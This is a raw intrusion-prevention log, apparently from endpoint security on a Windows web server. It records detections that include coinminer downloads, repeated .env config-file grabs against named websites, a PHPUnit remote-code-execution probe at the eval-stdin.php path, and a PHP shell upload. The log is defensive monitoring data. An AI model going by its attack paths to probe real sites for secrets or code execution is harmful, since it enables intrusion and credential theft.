00000da9	01dc94aa9bcab3cb	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94aa7750bd74	01dc94aa7750bd74	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI5MzY4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDgwNDkwODMwLCJ1aWQiOiI0NkU3M0M3Mi0wMDlCLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI3NzUwMkNERS05NEFBLTExRjEtQUYxNy0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0xNWYxNzViNS1kN2NlLTRhMjEtOGMzZC1kNzY1MDcwYjdmMzYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyMjg0OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA3OTM3MTYyMCwidWlkIjoiM0M0NTU3MjctMDA3RS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d439	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-content/themes/structure/images/logo.png			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
0000038e	01dc94aa9f1dde19	000000ce	0000000f	164a8367	546b84d4	00000002	00000002	00000001	01dc94aa7a89ae86	01dc94aa7a89ae86	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdBODhEQUFGLTk0QUEtMTFGMS1BRTcxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000dcc8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://toyota-tanphu.com/userfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
																																																																																																																																																																																																																																																																																																																																																																																																																																																																						
00003fd	01dc940dd5b358a9	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940db0c87d42	01dc940db0c87d42	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJCMEM1MzlGQS05NDBELTExRjAtQjgxRC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000074d1	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://namsion.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000403	01dc940de30be53d	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940dbf37f369	01dc940dbf37f369	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJCRjM0QTUwRS05NDBELTExRjAtQkUyQi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00003124	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://phanbonquocte.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000402	01dc940df3ba9778	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940dcefe84ae	01dc940dcefe84ae	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJDRUZEQzA4MC05NDBELTExRjAtQjRDQS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a3b0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://thcsltvdakto.edu.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000403	01dc940e46ff2de8	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940e22d1c3ab	01dc940e22d1c3ab	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIyMkNFOUE4OC05NDBFLTExRjAtODlGMi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000de93	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.vietinpharma.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003f9	01dc940e4dacd55d	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940e28248423	01dc940e28248423	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIyODIxNUQ5MC05NDBFLTExRjAtOEEyRC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000109c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://wiindi.net/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000402	01dc940e61ad053b	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940e3b1f2a68	01dc940e3b1f2a68	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIzQjFDOEI2Ri05NDBFLTExRjAtODIyMy0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000c4f5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://phuongbacjsc.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003ff	01dc940eb1ac8272	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940e8d933787	01dc940e8d933787	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI4RDhGRkY2Mi05NDBFLTExRjAtQTRCOC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000fda9	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.vinhphong.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000021f	01dc940ee39f6bc7	000000cf	00000007	164a8367	90a2b95d	00000001	00000000	00000001	01dc940ee19631b2	01dc94104736edb2	00000001	00000000	The client will block traffic from IP address 93.185.162.144 for the next 600 seconds (from 2/2/2026 1:40:54 PM to 2/2/2026 1:50:54 PM).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000405	01dc940efae66d44	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940ed42e43f8	01dc940ed42e43f8	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJENDJCMUQzRS05NDBFLTExRjAtODI1NS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000503a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://nguyendolawyers.com.au/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003f9	01dc940efae66d44	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940ed60fe250	01dc940ed60fe250	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJENjBENzM2Ni05NDBFLTExRjAtODUxRi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000067d8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://nonviet.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000439	01dc940f04e26ba3	000000ce	00000003	164a8367	90a2b95d	00000002	00000001	00000001	01dc940ee0e83a4a	01dc940ee0e83a4a	00000001	00000184	[SID: 30921] Web Attack: PHPUnit RCE CVE-2017-9841 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFMEU1RDdFNy05NDBFLTExRjAtQjlBQy0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiY3ZlX3VpZCI6IkNWRS0yMDE3LTk4NDEiLCJpZCI6MzA5MjEsIm5hbWUiOiJXZWIgQXR0YWNrOiBQSFBVbml0IFJDRSBDVkUtMjAxNy05ODQxIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000078c9	00010006	00000002	00000002	0000d6a4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: PHPUnit RCE CVE-2017-9841	http://duhoc.usc.edu.vn/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000405	01dc940f04e26ba3	000000ce	00000003	164a8367	90a2b95d	00000002	00000001	00000001	01dc940ee0ea9c93	01dc940ee0ea9c93	00000001	0000015c	[SID: 34889] Web Attack: PHP Shell Upload 15 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFMEU1RDdFNi05NDBFLTExRjAtQjlBQy0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjM0ODg5LCJuYW1lIjoiV2ViIEF0dGFjazogUEhQIFNoZWxsIFVwbG9hZCAxNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008849	00010003	00000002	00000002	0000d6a4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: PHP Shell Upload 15	http://duhoc.usc.edu.vn/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fe	01dc940f6247af00	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940f3e4faa83	01dc940f3e4faa83	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIzRTRDQzBBRC05NDBGLTExRjAtOUVEOS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000b892	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://shopapplevn.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000402	01dc940f659f1373	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940f40b4e512	01dc940f40b4e512	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI0MEI0NzQxMy05NDBGLTExRjAtOTFEQi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000064d9	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://suapinlaptop.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003f9	01dc940f86ed0690	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940f6169b693	01dc940f6169b693	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI2MTY2QUMzNC05NDBGLTExRjAtOEY5Mi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000189e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://xetaihp.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000407	01dc940fc2e5a6ee	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940f9c80844a	01dc940f9c80844a	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI5QzdENUQ1NC05NDBGLTExRjAtQjY1QS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000df94	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://phatgiaonamtongkhmer.org/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fc	01dc940fd6eb97a4	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940fb075d6d0	01dc940fb075d6d0	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJCMDczNUM2OS05NDBGLTExRjAtQUVCOS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000e756	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://portserco.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fe	01dc940fdd8e7e8a	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940fb869d53f	01dc940fb869d53f	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJCODY2RjI1OC05NDBGLTExRjAtQTIwRi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00001a85	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://tdnation.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
